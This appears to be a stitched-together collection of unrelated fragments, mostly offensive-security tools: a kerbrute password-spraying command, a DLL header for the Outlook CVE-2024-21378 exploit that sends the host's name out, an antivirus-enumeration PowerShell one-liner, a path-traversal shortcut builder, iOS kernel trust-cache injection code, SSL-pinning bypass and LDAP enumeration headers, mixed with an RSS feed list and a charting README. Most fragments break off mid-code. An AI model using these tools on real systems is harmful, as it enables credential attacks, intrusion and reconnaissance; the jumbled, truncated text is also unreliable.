With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
With the Rubeus version that includes the brute module:

<?xml version="1.0" encoding="UTF-8"?>
<opml version="1.0">
  <head>
    <title>RSS</title>
    <dateCreated>Sat, 19 Jul 2025 23:58:29 +0000</dateCreated>
    <ownerEmail>nope</ownerEmail>
  </head>
  <body>
    <outline text="citadel" title="citadel">
      <outline text="gynvael.coldwind//vx.log (pl)" title="gynvael.coldwind//vx.log (pl)" type="rss" xmlUrl="http://feeds.feedburner.com/GynvaelColdwindPL" htmlUrl="https://gynvael.coldwind.pl/"/>

/**
 * This DLL is designed for use in conjunction with the Ruler tool for
 * security testing related to the CVE-2024-21378 vulnerability,
 * specifically targeting MS Outlook.
 *
 * It can be used with the following command line syntax:
 * ruler [auth-params] form add-com [attack-params] --dll ./test.dll
 * Ruler repository: https://github.com/NetSPI/ruler/tree/com-forms (com-forms branch).
 *
 * After being loaded into MS Outlook, it sends the PC's hostname and

The script requires Python3 and the packages `numpy`, `pandas` and `matplotlib`.
It accepts an input file compatible with Mermaid (cf. `bb.data`) and generates a PNG file.
The tag `<br/>` is supported, so that a label can be displayed on several lines.
I use the font `Humor Sans`, which can be installed via `apt install fonts-humor-sans`.

/*
Author: Brandon Dalton (Red Canary Threat Research)
Date: 2023-12-07
Summary: This script attempts to instrument the `sendEvent:event:` method of the ESCoreAnalytics class.
- Download this script
- Target: You're targeting `endpointsecurityd`, so grab its PID: `sudo launchctl list | grep endpointsecurityd`
- To run: `sudo frida -p $PID -l es_coreanalytics_event_subs.js`
*/
const eventTypeMapping = {

console.log("[*] SSL Pinning Bypasses");
console.log(`[*] Your frida version: ${Frida.version}`);
console.log(`[*] Your script runtime: ${Script.runtime}`);
/**
 * by incogbyte
 * Common functions
 * thx apkunpacker, NVISOsecurity, TheDauntless
 * Remember that SSL pinning can be custom, and sometimes you need to reverse it using Ghidra, IDA or something like that.
 * !!! THIS SCRIPT IS NOT A SILVER BULLET !!

param ( [string]$SourceExe, [string]$DestinationPath, [string]$IconPath)
$WshShell = New-Object -comObject WScript.Shell
$Shortcut = $WshShell.CreateShortcut($DestinationPath)
$Shortcut.RelativePath = "..\..\..\..\..\..\..\..\..\$SourceExe"
$Shortcut.IconLocation = $IconPath
$Shortcut.TargetPath = $SourceExe
$Shortcut.Save()

#AntiVirus Query
#Author: @r3dQu1nn
#Queries the Registry for AV installed
#Thanks to @i_am_excite and @merrillmatt011 for the help
#Props to @zerosum0x0 for the wmic find!
#Long ass one-liner :)
$powershellcmd = "\$av_list = @(\"BitDefender\", \"Kaspersky\", \"McAfee\", \"Norton\", \"Avast\", \"WebRoot\", \"AVG\", \"ESET\", \"Malware\", \"Windows Defender\");\$av_install = Get-ItemProperty HKLM:\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\*;\$av_install1 = Get-ItemProperty HKLM:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\*;\$regkey = 'HKLM:\\SOFTWARE\\Microsoft\\Windows Defender\\Signature Updates\\';\$av_loop2 = foreach (\$av1 in \$av_list){foreach (\$key in \$av_install){if (\$key.DisplayName -match \$av1 -eq \$TRUE){% {\"{0}|{1}|{2}\" -f \$key.DisplayName.ToString(), \$key.DisplayVersion.ToString(), \$key.InstallDate.ToString()}}}};\$proc_temp = Get-Process;\$av_loop = foreach (\$av in \$av_list){foreach (\$zz in \$proc_temp){if (\$zz.path -match \$av -eq \$TRUE)

void inject_trusts(int pathc, const char *paths[])
{
    printf("[+] injecting into trust cache...\n");
    extern uint64_t g_kern_base;
    static uint64_t tc = 0;
    if (tc == 0) {
        /* loaded_trust_caches
        iPhone11,2-4-6: 0xFFFFFFF008F702C8

#!/usr/bin/env python
import argparse
import sys
import binascii
import socket
import re
from ldap3 import Server, Connection, NTLM, ALL, SUBTREE, ALL_ATTRIBUTES
# get /etc/hosts entries for domain-joined computers from A and AAAA records (via LDAP/ADIDNS) (@3xocyte)